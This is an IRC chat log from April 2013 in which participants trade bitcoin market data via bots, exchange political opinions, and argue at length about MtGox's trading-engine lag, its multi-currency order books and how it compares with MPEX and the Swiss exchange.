08:06:42 The new BVI data, by contrast, contains more than 200 gigabytes Apr 04 08:06:46 you can sorta smell the butthurt. Apr 04 08:06:56 the problem with this is that being a govt official IS immoral, Apr 04 08:06:58 whereas being rich is not. Apr 04 08:07:07 of course msm would like to make it so it's the other way around. Apr 04 08:09:53 [\\\]: "I'm just glad your mother didn't live to see you become a mermaid." "MERMAN... MERMAN!!" Apr 04 08:11:05 mircea_popescu: it used to be that people didn't go into government service (unless .mil) until they were pretty successful in the private sector. Not any longer, its like people get out of school and they want to go right into government. What gives? Apr 04 08:11:31 they have no skills, no ability and won't do any work. Apr 04 08:11:36 govt is the only thing that'd hire them Apr 04 08:12:52 yeah, certainly low ability to be a bread-winner or entrepreneur -- so just go into gov and get a cushy handout Apr 04 08:13:35 [MPEX] [S.MPOE] 1219 @ 0.00070345 = 0.8575 BTC [+] Apr 04 08:13:37 [MPEX] [S.MPOE] 6781 @ 0.00070496 = 4.7803 BTC [+] Apr 04 08:13:48 back in the day a guy would have a career for his life and then when asked or when he "felt the call of duty" would go into politics. More likely because at that level they can take even bigger amts of cash from lobbiests. Apr 04 08:14:05 *lobbyists Apr 04 08:14:18 heh Apr 04 08:14:23 *shrug* Apr 04 08:16:44 People over here are pretty convinced that if the government went away the sky would fall. Apr 04 08:17:21 It's probably the furthest thing from the truth. Apr 04 08:18:23 What self-respecting dude would ever let some spinless twit make the rules for him? Apr 04 08:19:18 I better get off this soapbox .. lol Apr 04 08:19:59 [MPEX] [S.MPOE] 9100 @ 0.00069971 = 6.3674 BTC [-] Apr 04 08:20:01 [MPEX] [S.MPOE] 558 @ 0.00069484 = 0.3877 BTC [-] Apr 04 08:21:11 I think people just want to be told what to do. Apr 04 08:21:18 It's a short cut to thinking. Apr 04 08:21:45 just give me a hammer and a sicle and tell me where to work and how to spend my money at the general store. Apr 04 08:21:49 and bitcoincharts is down again Apr 04 08:22:18 *sickle Apr 04 08:22:43 those sites go up and down more than a las vegas hooker Apr 04 08:25:27 So I read this book Anna Karenina a few years back and I recently saw the movie with Jude Law and whomever.. the new one. Apr 04 08:25:40 ;;ticker Apr 04 08:25:42 BTCUSD ticker | Best bid: 129.00000, Best ask: 129.84754, Bid-ask spread: 0.84754, Last trade: 129.84754, 24 hour volume: 156282.00223296, 24 hour low: 110.00000, 24 hour high: 147.00000, 24 hour vwap: 128.88957 Apr 04 08:25:51 Which kinda sucked actually because it was filmed like a play... Apr 04 08:26:50 but it followed the book pretty close. Anyway, its interesting how the classes were so seperated. Like the character Konstantin Levin has all of these pesants that he litereally owns, as slaves. Apr 04 08:27:26 And he feels bad about this in some fashion, so he takes it upon himself to join them in their daily labor in the fields, etc. And they actually resent him for it. Apr 04 08:28:52 They want him to take his proper place as lord, and the peasants want to serve him in that way. Apr 04 08:29:02 Not sure why i bring that up. Apr 04 08:29:09 I'm pretty tired i guess :/ Apr 04 08:29:38 I like reading old books. Apr 04 08:30:21 Always fascinating to compare and contrast the past with the present. Apr 04 08:32:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [-] Apr 04 08:32:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Apr 04 08:33:21 heh, just me? Apr 04 08:35:30 [BTCTC] [BASIC-MINING] 1 @ 0.3711 BTC [-] Apr 04 08:35:53 (21:34) < [\\\]> note to self, always go mudding with the windows open << yea! i heard darwin got these ding-dongs Apr 04 08:36:41 m00 Apr 04 08:36:51 <[\\\]> I think copumpkin reserved that Apr 04 08:39:17 [BTCTC] [PAJKA.BOND] 4 @ 0.1028 = 0.4112 BTC [+] Apr 04 08:40:42 here's some latenight comedy: http://politicalticker.blogs.cnn.com/2013/04/03/obama-will-give-up-portion-of-his-salary/?hpt=hp_t5 Apr 04 08:45:21 They want him to take his proper place as lord, and the peasants want to serve him in that way. << you know, people do. Apr 04 08:45:32 this entire equality bs is an expensive fiction really. Apr 04 08:45:39 [BTCTC] [COG.F] 1 @ 2.49 BTC [+] Apr 04 08:45:51 [BTCTC] [ASICMINER-PT] 1 @ 0.7541 BTC [+] Apr 04 08:45:55 [BTCTC] [ASICMINER-PT] 1 @ 0.7544 BTC [+] Apr 04 08:45:58 [BTCTC] [ASICMINER-PT] 1 @ 0.7545 BTC [+] Apr 04 08:46:04 [BTCTC] [ASICMINER-PT] 1 @ 0.7546 BTC [+] Apr 04 08:46:07 [BTCTC] [ASICMINER-PT] 3 @ 0.7547 = 2.2641 BTC [+] Apr 04 08:46:11 [BTCTC] [ASICMINER-PT] 20 @ 0.7548 = 15.096 BTC [+] Apr 04 08:46:14 [BTCTC] [ASICMINER-PT] 3 @ 0.7549 = 2.2647 BTC [+] Apr 04 08:46:19 [BTCTC] [ASICMINER-PT] 1 @ 0.755 BTC [+] Apr 04 08:46:40 Yeah over the last 25 years, at least over here, much of the social dogma is about how everyone is equal and must be treated as such. Apr 04 08:49:13 It's hard to have competiton if everyone is supposed to be the same; however it also seems to manifest entitlement issues for sure. Nothing is equal, and never has been, but they say it is. Apr 04 08:49:14 Its a gigantic mind-job. Apr 04 08:50:59 moreover... Apr 04 08:51:05 people.literally.wish.to.serve. Apr 04 08:51:27 all this angst and loneliness and rest of the bs they keep making sitcoms about... Apr 04 08:51:40 it's really the story of slaves who can't find masters because they don't know they need them. Apr 04 09:03:33 Yeah, I think that people just want to do their duty and do it well (whatever that means) and get the approval or reward they deserve. Apr 04 09:05:55 [BTCTC] [S.BBET-PT] 167 @ 0.00177 = 0.2956 BTC [+] Apr 04 09:09:12 [MPEX] [S.MPOE] 6314 @ 0.00069956 = 4.417 BTC [+] Apr 04 09:15:43 well, i better call sleep(), gn -assets :) Apr 04 09:37:29 ;;asks 147 Apr 04 09:37:31 There are currently 11888.865 bitcoins offered at or under 147.0 USD, worth 1685894.41434 USD in total. | Data vintage: 0.0018 seconds Apr 04 09:37:47 AM going up, good news? Apr 04 09:47:42 not really, divie was lowest ever this week Apr 04 09:48:07 i think that's just an uptick from the selloff Apr 04 09:48:26 !ticker btct asicminer-pt Apr 04 09:48:28 [BTCT:ASICMINER-PT] 1D: 0.683004 / 0.74436 / 0.78997 (241 shares, 179.4 BTC), 7D: 0.66 / 0.76962 / 0.87968 (2896 shares, 2228.8 BTC), 30D: 0.59998 / 0.7656 / 1 (8136 shares, 6228.9 BTC) Apr 04 09:48:33 well it's just back up to where it almost was yesterday.. there was a minor selloff earlier Apr 04 09:48:45 sorta treading water. Apr 04 09:49:26 they paid for something ike 100 wafers from this weeks div Apr 04 09:49:31 that's why it low Apr 04 09:49:39 what's the format of those quotes? low / something? / high ? Apr 04 09:49:52 https://bitcointalk.org/index.php?topic=166794 Apr 04 09:49:58 lmao that shows promise Apr 04 09:50:09 mtgox actually thinks they're doing a good job ?! Apr 04 09:50:49 this is like one of those when serial killer goes on to testify and tells the judge all those people were conspiring to kill him so he was perfectly justified Apr 04 09:51:31 toffoo low/vwap/high Apr 04 09:51:39 thnx Apr 04 09:55:19 "In a bid to avoid revealing the details of a secret ruling on domestic surveillance, the White House has warned a federal judge that making the decision public could do “exceptionally grave and serious damage to the national security” of the country." Apr 04 09:55:21 le lol. Apr 04 09:55:49 secret ruling. ruling is precedent and precedent is law. ignorance of the law is no defense. Apr 04 09:55:53 this seems legit. Apr 04 09:58:46 [MPEX] [S.DICE] 1000 @ 0.00310001 = 3.1 BTC [+] Apr 04 09:58:48 [MPEX] [S.DICE] 168 @ 0.0031 = 0.5208 BTC [-] Apr 04 09:59:03 [HAVELOCK] [SDICE] 2 @ 0.3 = 0.6 BTC [-] Apr 04 09:59:04 [HAVELOCK] [SDICE] 3 @ 0.2731 = 0.8193 BTC [-] Apr 04 09:59:06 [HAVELOCK] [SDICE] 20 @ 0.273 = 5.46 BTC [-] Apr 04 09:59:07 [HAVELOCK] [SDICE] 8 @ 0.25 = 2 BTC [-] Apr 04 09:59:13 "I understand that many of you have a lot at stake here, but remember that Bitcoin, despite being designed to have its value increase over time, will always be the victim of people trying to abuse the system, or even the value of Bitcoin decreasing occasionally." Apr 04 10:00:47 bitcoin designed to have its value increase over time... some outrageous memepic needed here Apr 04 10:01:57 lol Apr 04 10:02:02 ;;ticker Apr 04 10:02:02 BTCUSD ticker | Best bid: 131.14373, Best ask: 131.16321, Bid-ask spread: 0.01948, Last trade: 130.00000, 24 hour volume: 142825.56797466, 24 hour low: 110.00000, 24 hour high: 147.00000, 24 hour vwap: 128.99877 Apr 04 10:02:04 lmao what the fuck is that Apr 04 10:02:41 from that mtgox announcement you linked Apr 04 10:02:45 if he thinks noone made money today he is an idiot Apr 04 10:02:46 omfg mtgox pr ?! Apr 04 10:02:51 jesus christ how can they be this stupid Apr 04 10:03:09 your -pr girl already grilled it Apr 04 10:04:02 best part is apparently mtgox's official new communications platform is their Facebook page Apr 04 10:04:09 doh. Apr 04 10:04:31 no, im taking the time to blow this to bits, they're too stupid to live at this point. Apr 04 10:09:27 [MPEX] [S.DICE] 1750 @ 0.00322848 = 5.6498 BTC [+] Apr 04 10:13:45 [BTCTC] [ASICMINER-PT] 1 @ 0.701 BTC [-] Apr 04 10:14:05 [MPEX] [S.DICE] 3081 @ 0.0033333 = 10.2699 BTC [+] Apr 04 10:14:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7001 BTC [-] Apr 04 10:14:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7001 BTC [-] Apr 04 10:15:12 [BTCTC] [ASICMINER-PT] 1 @ 0.705 BTC [+] Apr 04 10:15:54 [BTCTC] [ASICMINER-PT] 1 @ 0.701 BTC [-] Apr 04 10:17:28 [MPEX] [S.MPOE] 13086 @ 0.00069956 = 9.1544 BTC [+] Apr 04 10:24:21 [MPEX] [S.MPOE] 2532 @ 0.00069696 = 1.7647 BTC [-] Apr 04 10:25:30 sdice .25 50% moew down and its my buying range Apr 04 10:26:50 We can fix lag, but we cannot eradicate lag. Apr 04 10:26:52 well Apr 04 10:27:06 i'm moving to bitfloor Apr 04 10:27:39 myeah. Apr 04 10:28:04 i doubled my cash couple times more in btc24 Apr 04 10:28:09 0.5 btc to 25 Apr 04 10:28:18 im not gonna cash out cuz im not a scumbag tho Apr 04 10:28:45 but taht this is still being ignored tells a lot about the community Apr 04 10:31:34 [MPEX] [S.MPOE] 9900 @ 0.00070496 = 6.9791 BTC [+] Apr 04 11:08:07 ;;ticker Apr 04 11:08:08 BTCUSD ticker | Best bid: 132.00001, Best ask: 132.48000, Bid-ask spread: 0.47999, Last trade: 132.48000, 24 hour volume: 136079.90017269, 24 hour low: 110.00000, 24 hour high: 147.00000, 24 hour vwap: 128.37137 Apr 04 11:15:14 [BTCTC] [ASICMINER-PT] 1 @ 0.7571 BTC [+] Apr 04 11:21:49 [BTCTC] [BTC-TRADING-PT] 5 @ 0.1722 = 0.861 BTC [-] Apr 04 11:22:28 !last h vtx Apr 04 11:22:28 Last trade for VTX on HAVELOCK was at 0.4 BTC [-] Apr 04 11:22:37 !last m s.dice Apr 04 11:22:37 Last trade for S.DICE on MPEX was at 0.0033333 BTC [+] Apr 04 11:22:50 !ticker m s.dice Apr 04 11:22:51 [MPEX:S.DICE] 1D: 0.0031 / 0.00311302 / 0.0035 (389109 shares, 1,211.31 BTC), 7D: 0.0031 / 0.0032045 / 0.00439992 (1029316 shares, 3,298.45 BTC), 30D: 0.00300001 / 0.00375489 / 0.006 (1726965 shares, 6,484.57 BTC) Apr 04 11:23:01 wuuuuut Apr 04 11:23:53 no more exit for S.dice ! Good luck to all holders Apr 04 11:24:42 bid is 0.002 now Apr 04 11:28:05 http://trilema.com/2013/its-been-an-epic-few-days-what-happened/ Apr 04 11:28:08 here we go. Apr 04 11:42:10 mircea_popescu: Do you know of any better exchanges? Apr 04 11:42:58 I've tried many. MtGox is the fastest by far under normal circumstances, and the only one able to handle this volume. Apr 04 11:43:27 If you know hoe to fix their problems, you should create a better exchange. Apr 04 11:44:18 was mtgox really a trading card exchange? i thought it was a rumor Apr 04 11:45:34 A 100 Gbps DDoS isn't easy to handle for anyone. Reminds me of the Coudflare attack where the attackers went for their upstream providers and kicked out a few national IXes. I think that one was 40 Gbps. Apr 04 11:46:26 taub: The first version by Jeb was based on a card trading exchange he wrote, yes. Apr 04 11:46:38 It has been completely rewritten since then. Apr 04 11:47:09 (M)agic(t)he(G)athering? Apr 04 11:47:10 sturles it was rewritten, yes Apr 04 11:47:15 but it wasn't professionally rewritten. Apr 04 11:47:25 love that article btw Apr 04 11:47:26 they just need to get a proper platform Apr 04 11:47:37 before htey couldn't afford that, so i get it. but now the yhave the money to pay for it, Apr 04 11:47:39 However, there are many who will try to take advantage of the system. The past few days were a reminder of this sad truth. Apr 04 11:47:43 all that's left is to do it. Apr 04 11:47:47 yes, love the fact that you bash him for that Apr 04 11:48:00 just shows again how fucking uneducated they are Apr 04 11:48:20 mircea_popescu: A good trading platform isn't something you can go out and buy. Apr 04 11:48:26 taub in fairness pretty much everyone involved with bitcoin has had a huge task just dropped on their lap. Apr 04 11:48:40 sturles you get a license. there's corps specialising in this. Apr 04 11:48:48 you pay a pretty penny and get decent service. Apr 04 11:49:08 something that sucks less than mtgox is easy tho Apr 04 11:49:15 what, you think the romanian stock exchange runs on software developped by romania's central bank governor ? Apr 04 11:49:16 Yep, they could close their API and make people pay to be allowed to connect. Apr 04 11:49:25 Like stock exchanges. Apr 04 11:49:41 there's no way to avoid that. Apr 04 11:49:41 But I don't think that would help much. Apr 04 11:49:45 yea, but that isn't the problem yet i think, they aren't nearly at capacity from a hw standpoint Apr 04 11:49:52 they just have really bad software Apr 04 11:49:53 they're already trying to copy the mpex broker model, but they're doing it stupidly/half bakedly Apr 04 11:49:57 and with losers like coinlab. Apr 04 11:50:11 It will help against the lag, yes, but at the same time make MtGox less attractive to use. Less volume, less revenye. They will have to find a balance. Apr 04 11:50:16 the only way to do this is the way this is done. Apr 04 11:50:39 exchange and clearance are sepparate not because peopl;e have nothing better to do with their time, for instance. Apr 04 11:51:00 taub: Do you know about any better exhanges? Any faster exchanges? Any other exchanges able to handle their load? Apr 04 11:51:17 sturles each and every national exchange. ~100 of them. Apr 04 11:51:25 the swiss stock exchange. take that. Apr 04 11:51:45 mircea_popescu: Those are not for public use. You have to pay $$$$$$$ for a licence to connect. Apr 04 11:51:48 Not comparable. Apr 04 11:51:50 of course! Apr 04 11:51:50 well, i'll be moving over to bitfloor and try them Apr 04 11:51:57 they made what, 10mn this month in fees ? Apr 04 11:51:58 And they don't have to handle balances. Apr 04 11:52:03 let them spend that to get a proper platform wtf. Apr 04 11:52:10 mtgox is still not beatable in liquidity of course Apr 04 11:52:31 mircea_popescu: Revenue != profit. Apr 04 11:52:35 nevertheless. Apr 04 11:52:53 again : this is not up to discussion. if you want to do this you'll have to do it. otherwise it's not done. Apr 04 11:53:07 they'll copy the mpex model whether they want to or not, because the mpex model is not an accident Apr 04 11:53:11 yea agree Apr 04 11:53:13 it's simply the result of me knowing finance Apr 04 11:53:22 there needs to be clearing houses/ brokers Apr 04 11:53:24 which apparently makes me a rare bird, but that's really irrelevant. Apr 04 11:53:31 cant do it all in one Apr 04 11:53:50 taub they may try to originally, anyway. Apr 04 11:54:08 Any exchange can copy the mpex and try that model if they think it wioll work for a publick high volume exchange with high liquidity and trading volume. I don't. Apr 04 11:54:09 but soon enough they'll figure the advantages of splitting it and that'll be that. Apr 04 11:54:12 okay, well it is possible, betting sites do it Apr 04 11:54:23 betfair is just a big exchange, probably more volume than mtgox Apr 04 11:54:27 sturles you don't seem to understand that everything that works works like mpex. Apr 04 11:54:38 Even MtGox? Apr 04 11:54:42 mtgox doesn't work. Apr 04 11:54:46 Yes, it does. Apr 04 11:54:47 the swiss stock exchange does work. Apr 04 11:54:53 heh. well then that's the root of our problem. Apr 04 11:55:11 most people aren't gonna get gpg to trade on an exchange. seriously Apr 04 11:55:13 steady lag of more than a minute is not working by far Apr 04 11:55:19 TradeFortress gpg isn't the point there tho. Apr 04 11:55:28 they're implementing the separate trade engine model (which is good) Apr 04 11:55:35 How many thousands of traders does the swiss stock exchange have directly connected to their API? Apr 04 11:55:37 and they will end up having to use brokers and separate clearance. Apr 04 11:56:17 mircea_popescu: You want something else. And you are free to make something completely different from MtGox if you think it will be successfull. I don't. Apr 04 11:56:23 sturles are you about to propose shithole mtgox doing 100mn a month is larger an operation than six ? Apr 04 11:56:26 it is not don;'t be silly. Apr 04 11:56:38 well... this isn't a vote. Apr 04 11:56:50 There are a few things that we can implement to help fight the attacks, such as disconnecting the trade engine backend from the Internet. By separating the data center from the Mt.Gox website, we will continue to be able to trade Apr 04 11:56:54 THESE PROBLEMS HAVE BEEN AROUND FOR YEARS Apr 04 11:57:03 i wonder what they do over there srsly Apr 04 11:57:18 taub take 3 weeks to read trilema. dun dun dun. Apr 04 11:57:28 not doing anything obviously Apr 04 11:57:34 The "shithole mtgox" happens to be the only bicoin trading site able to handle this number of traders and activity. Apr 04 11:57:53 If it is so simple to make something better, you should go ahead and do it. Apr 04 11:57:54 sturles "Thanks to high capacity reserves and an average round-trip latency of just 37 microseconds for equity trading, investment decisions can be implemented faster and risks adjusted more quickly" Apr 04 11:57:56 ^ also with an unacceptable amount of lag. Apr 04 11:57:57 read that number again. Apr 04 11:58:02 37 microseconds. get it ? Apr 04 11:58:25 not mili. Apr 04 11:58:42 I'm pretty sure many exchanges are going to hit similar amounts of lag if they reach gox's amount of users and trades Apr 04 11:58:44 And I don't believe SIX has more people talking to their API than MtGox. Not for a second. Apr 04 11:58:47 but that doesn't make it something you should accept Apr 04 11:59:00 sturles you don't believe six handles more trade thoroughput than mtgox ?! Apr 04 11:59:07 what is this, the cartoons ? Apr 04 11:59:23 mircea_popescu: That was not what I wrote. Apr 04 11:59:34 mircea_popescu: You are comparing apples and oranges. Apr 04 11:59:57 [MPEX] [S.MPOE] 11539 @ 0.00069906 = 8.0665 BTC [-] Apr 04 11:59:59 listen, not to be an ass, but are you at all qualified to discuss this topic ? Apr 04 11:59:59 [MPEX] [S.MPOE] 711 @ 0.00069661 = 0.4953 BTC [-] Apr 04 12:00:05 MtGox wouldn't be dreaming of their current volume if they converted to a traditional stock exchange model. Apr 04 12:00:08 other than being involved in bitcoin, do you know anything about exchanges etc ? Apr 04 12:00:23 So volume would be irrelevant. Apr 04 12:00:41 because there seem to be pretty huge disconnects here i can't quite bridge. Apr 04 12:00:50 Yes, I know a few things about exchanges and how they work. Apr 04 12:00:53 okay. Apr 04 12:01:03 so then what difference do you see between what i wrote and what you wrote above ? Apr 04 12:01:31 Stock exchanges work by letting licenced brokers do their dirty work. Apr 04 12:01:34 yeah. Apr 04 12:01:58 So MtGox is something completely different. Apr 04 12:02:01 no, it is not. Apr 04 12:02:12 listen, just because you think it is doesn't make it so. Apr 04 12:02:22 as long as it exchanges it's an exchange. Apr 04 12:02:32 same constraints apply, same results arise. Apr 04 12:03:01 It is more of a broker than an exchange. Apr 04 12:03:11 the model doesn't work tho, they need a platform to trade on. Apr 04 12:03:20 once they get that nothing prevents them from being their own amtrade Apr 04 12:03:26 and offer a website front for people to connect to Apr 04 12:03:27 An exchange handles a very limited part of the exchange process. Apr 04 12:03:30 and then that'd be the inhouse broker. Apr 04 12:03:39 heck, that's exactly what mpex does atm. Apr 04 12:04:13 So, does Mpex handle MtGox's number of users, volume and frequency? Apr 04 12:04:13 [BTCTC] [ASICMINER-PT] 1 @ 0.7571 BTC [+] Apr 04 12:04:20 $mpexlag Apr 04 12:04:22 mircea_popescu: 0.106014966965 seconds Apr 04 12:04:40 that's the key factor. get back to me when you see it over .2 or so. Apr 04 12:05:14 mircea_popescu: At what frequency? How many trades per second? Apr 04 12:05:22 And how many connected users? Apr 04 12:05:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7573 BTC [+] Apr 04 12:05:36 sturles there's about 2k requests simultaenous atm Apr 04 12:05:40 when mpoe bot refreshes its book Apr 04 12:05:53 which mtgox never handles, afaik. Apr 04 12:06:09 Howe many trades per second? Apr 04 12:06:30 dude. mpex gets ~2000 orders SIMULTAENOUSLY. Apr 04 12:06:36 this happens every ~10 minutes. Apr 04 12:07:39 as far as i know the most mtgox can take is something to the order of 10 simultaneous orders. certainly not 100. Apr 04 12:07:44 there is a huge gap here. Apr 04 12:08:27 gox orders do tend to fill more asks/bids, don't they? Apr 04 12:08:43 MtGox does no simultaneous orders for the same currency (BTC), because there is one order book. Like a stock exchange trading only one stock. Apr 04 12:10:34 what difference does that make ? Apr 04 12:10:42 suppose 2000 users all happened to put an order in at the same time. Apr 04 12:12:09 [MPEX] [S.MPOE] 13582 @ 0.00069661 = 9.4614 BTC [-] Apr 04 12:13:14 Two bids can not be matched against the same ask, for one thing. You need locking. MtGox also process all orders in strict sequence. Apr 04 12:13:27 this is neither here nor there. Apr 04 12:13:30 No sneaking in the order queue. Apr 04 12:13:35 what's it to do with anything ? Apr 04 12:14:00 Fairness. Apr 04 12:14:13 ... Apr 04 12:14:19 let's get back on track here. Apr 04 12:14:30 people issue orders. engine chokes. Apr 04 12:14:40 With only one asset to trade, it is impossible to match two orders at the same time. Apr 04 12:14:47 you don't have to match them Apr 04 12:14:53 you just process them. Apr 04 12:14:58 add them to the book, for instance. Apr 04 12:15:12 Yes, and when the book overlaps? Apr 04 12:15:18 you spit out the trade. Apr 04 12:15:28 Correct. Apr 04 12:15:30 right. Apr 04 12:15:45 That's basically what MtGox does. Apr 04 12:16:09 yes. the problem here is this : mpex gets 2k simultaneous orders, lag stays under .2 Apr 04 12:16:17 mtgox gets 10 simultaneous orders, lag spikes over 100 Apr 04 12:17:23 look through their historical list, rarely will they report anything over 100 trades a minute, even at the height of height. Apr 04 12:17:34 this is their engine choking, it can't process fast enough. Apr 04 12:17:37 How many simultaneous orders do you think MtGox gets? My home network isn't able to handle their socketio feed of order book changes when the lag approaches 300s. Apr 04 12:18:03 heh, see above. Apr 04 12:18:36 MtGox process more than 10 trades a second even during high load. The number of order book changes is _a lot_ higher. Apr 04 12:19:52 The number of orders happening simultaneously (nothing does), is irrelevant. Apr 04 12:20:04 arent there like multiple open source exchanges? Apr 04 12:20:09 by now Apr 04 12:20:11 Yes, there are. Apr 04 12:20:28 None of them come close to MtGox in speed. Apr 04 12:20:37 not sure about that :) Apr 04 12:20:46 Try them. Apr 04 12:21:27 [MPEX] [S.MPOE] 6507 @ 0.00069661 = 4.5328 BTC [-] Apr 04 12:21:29 [MPEX] [S.MPOE] 4811 @ 0.00069484 = 3.3429 BTC [-] Apr 04 12:21:31 [MPEX] [S.MPOE] 9600 @ 0.00069391 = 6.6615 BTC [-] Apr 04 12:21:32 [MPEX] [S.MPOE] 10682 @ 0.0006928 = 7.4005 BTC [-] Apr 04 12:22:04 mircea_popescu: Does mpex really process 2k trades simultaneously for the same asset? Apr 04 12:22:18 With only 0.2 s lag? Apr 04 12:22:50 Or are you comparing apples to oranges again? Trades != order book changes. Apr 04 12:23:07 they have to decouple their frontside with registration, account management etc from their trading engine Apr 04 12:23:29 i dont think the matching engine can focus on matching ... it also calculates new balances etc Apr 04 12:23:44 and checks if you have enough balance to put in an order Apr 04 12:24:17 its got some fundamental design flaws :s Apr 04 12:24:43 [BTCTC] [GSDPT] 56 @ 0.00321 = 0.1798 BTC [-] Apr 04 12:24:46 [BTCTC] [GSDPT] 16 @ 0.0032 = 0.0512 BTC [-] Apr 04 12:24:48 [BTCTC] [GSDPT] 100 @ 0.00316 = 0.316 BTC [-] Apr 04 12:24:51 [BTCTC] [GSDPT] 5 @ 0.00314 = 0.0157 BTC [-] Apr 04 12:24:53 [BTCTC] [GSDPT] 32 @ 0.003108 = 0.0995 BTC [-] Apr 04 12:26:33 sturles it's not trades, it's orders. Apr 04 12:26:50 can you show me some documentation somewhere for this part : "MtGox process more than 10 trades a second even during high load. The number of order book changes is _a lot_ higher." Apr 04 12:26:57 cause that i'd benefit by Apr 04 12:27:01 taub: A few things can be done, yes. An important (to me) feature of MtGox is the ability to have inactive orders (due to lack of funds) automatically activated when funds arrive. Removing this feature, and only allowing funded orders, will speed up the exchange a lot. But it will also remove an important feature making the exchange less attractive for that reason. Apr 04 12:27:38 that is a nice feature, but it lags the engine down Apr 04 12:27:39 this is irrelevant in the discussion tho. Apr 04 12:27:52 Based on simple counting of trades in #bitcoin-market. Apr 04 12:27:55 its one of the main reasons it lags, and they can have that feature and still not make the exchange lag Apr 04 12:27:56 having some tinker-product homebrew nonsensical thing used as a trade engine is nonsense. Apr 04 12:28:16 sturles orderbook changes show in #bitcoin-market ? Apr 04 12:28:44 mircea_popescu: I have been working in IT for more than 20 years, and homebrew beats commercial products in 9 of 10 cases,. Apr 04 12:28:51 mircea_popescu: No. Apr 04 12:29:07 yeah well, i'm putting all this down to geek disease then. Apr 04 12:29:07 mircea_popescu: You have to use the socketIO feed for that. Apr 04 12:29:34 you mean autism? Apr 04 12:29:44 mircea_popescu: And my home network is only 6 mbit/s, so I can't follow it during the DDoS sessions. To many order changes. Apr 04 12:29:48 no, just this bizzaro superman attitude. homebrew beats commercial. Apr 04 12:29:57 wtf, we're talking about pretty much the one field where that's not the case. Apr 04 12:30:16 So prove it FFS. Apr 04 12:30:28 i'm not interested in handling fiat and this is not an argument. Apr 04 12:30:30 [BTCTC] [GSDPT] 1 @ 0.00301 BTC [-] Apr 04 12:30:33 [BTCTC] [GSDPT] 500 @ 0.003 = 1.5 BTC [-] Apr 04 12:30:37 If you think you can go out buy a better bitcoin exchange, just do it. Apr 04 12:30:51 listen to me. this isn't a case of "i think" Apr 04 12:31:14 this is a case of me having some competence and a bunch of geeks thinking they know better on the strength of their experience hacking their own nat router. Apr 04 12:31:14 Yes, so far it is you thinking. Apr 04 12:32:21 How many trades per second can mpex handle in the same asset while the number of orders are still ticking in at 2k/s? Apr 04 12:32:54 it makes no difference. trades aren't a bottleneck. if the 2k orders result in 2k trades or 2k orderbook changes or nothing at all, it's the same. Apr 04 12:33:05 and 2k it should be able to support indefinitely. Apr 04 12:34:27 obviously that's tested reality and real reality will diverge as soon as it gets a chance, but still. Apr 04 12:34:36 How many currencies can I trade the same asset in? Apr 04 12:34:48 what ? Apr 04 12:35:22 MtGox supports matching buys and asks in different currencies to each other. How many does mpex handle? Apr 04 12:35:30 what sort of left field nonsense is that! mtgox only trades bitcoin. mpex only trades bitcoin. that mtgox has usd and eur and aud and w/e assets Apr 04 12:35:36 This is the second largest reason for their slowness. Apr 04 12:35:40 whereas mpex has s.dice and s.bbet etc makes jackshit of a difference. Apr 04 12:35:45 i think you're confused. Apr 04 12:36:52 MtGox trades bitcoin against a long list of different currencies. A separate order book for each currency. Order books are connected at +/-2 2.5% of current exchange value. Apr 04 12:37:25 This is the number two reason for slowness. Apr 04 12:37:32 i would guess the long list of ~250 option lines is longer than whatever list of mtgox currencies Apr 04 12:37:38 which iirc was like 8. Apr 04 12:38:53 A bit more: USD, AUD, CAD, CHF, CNY, DKK, EUR, GBP, HKD, JPY, NZD, PLN, RUB, SEK, SGD, THB Apr 04 12:39:05 mkay... Apr 04 12:39:24 so what, i can put an order to sell a bitcoin for 2 cad or 2.5 dkk ? Apr 04 12:39:28 why's this a big deal / Apr 04 12:40:07 Because the order has to be reflected in all order books. Apr 04 12:40:33 At currency conversion rate +2.5%. Apr 04 12:40:34 so you get some order replication. Apr 04 12:40:39 um. Apr 04 12:40:49 wait, the conversion is not user specified ? Apr 04 12:40:54 No. Apr 04 12:40:57 ... Apr 04 12:40:58 then ? Apr 04 12:41:03 Automatic. Apr 04 12:41:30 don't be silly. there's no such thing. they query some service ? Apr 04 12:41:35 [MPEX] [S.DICE] 200 @ 0.0033331 = 0.6666 BTC [-] Apr 04 12:41:50 They use the current ECB rate for currency conversion. Apr 04 12:42:01 so then it's a magic number, they load it once a day Apr 04 12:42:09 i fail to see the big deal. Apr 04 12:42:48 Yes. The big deal is that one order book change becomes 16. Apr 04 12:43:06 this is not a big deal, unless you're homebrew. Apr 04 12:43:12 Rate changes may cause trades to happen- Apr 04 12:43:15 seriously, this was an exercise in wasting my time. Apr 04 12:43:24 mtgox still needs to get a real platform and professionalise. Apr 04 12:43:34 bitcoin geeks still need to give up the disease and get serious. Apr 04 12:43:36 nothing changed. Apr 04 12:44:04 mircea_popescu: What does homebrew has to do with anything? Apr 04 12:44:27 you are sitting there and seriously telling me 16x replication is a big deal ? Apr 04 12:44:35 this on top of the entire six doesn't come close to mtgox ? Apr 04 12:44:36 Except showing lack of experience in IT. Apr 04 12:44:49 listen, experience in it is a commodity. it's worth a salary, nothing more. Apr 04 12:44:58 we are here in management territory. different beast. Apr 04 12:45:07 managers make %s. Apr 04 12:45:32 You are still comparing apples and oranges. SIX != MtGox. Not even close. In so many ways I don't even bother to get started. Apr 04 12:46:22 as far as i'm concerned the situation here is that you are grossly unqualified to discuss this matter and still insist to do so (because as per the texbook you also lack the metacognitive abilities that'd allow you to realise you're way off). Apr 04 12:46:39 the only way this goes any further is we start insulting each other, so let's just leave it be. Apr 04 12:48:26 And believe me -- I have tried many times to get expensive commercial solutions to difficult problems to work, and in most cases I end up with a much faster and better working homebrew solution. Commercial software developers do it for their salary, not for efficiency, elegance or anything else. Apr 04 12:50:53 ;;ticker Apr 04 12:50:54 BTCUSD ticker | Best bid: 132.00000, Best ask: 132.98098, Bid-ask spread: 0.98098, Last trade: 131.83755, 24 hour volume: 125243.62956022, 24 hour low: 110.00000, 24 hour high: 142.00000, 24 hour vwap: 127.71252 Apr 04 12:50:55 If you think you can buy a better exchange and make it work better, then please go ahead. Everyone will encourage you to do so. If you are successful, you better be prepared for 100 Gbps DDoS attacks as well, but that should be no problem because every broker has a dedicated line. Right? Apr 04 12:51:20 ;;nethash Apr 04 12:51:22 59892.4976199 Apr 04 12:51:22 sturles you're not keeping up. i HAD 100gbps ddos Apr 04 12:51:24 and i beat 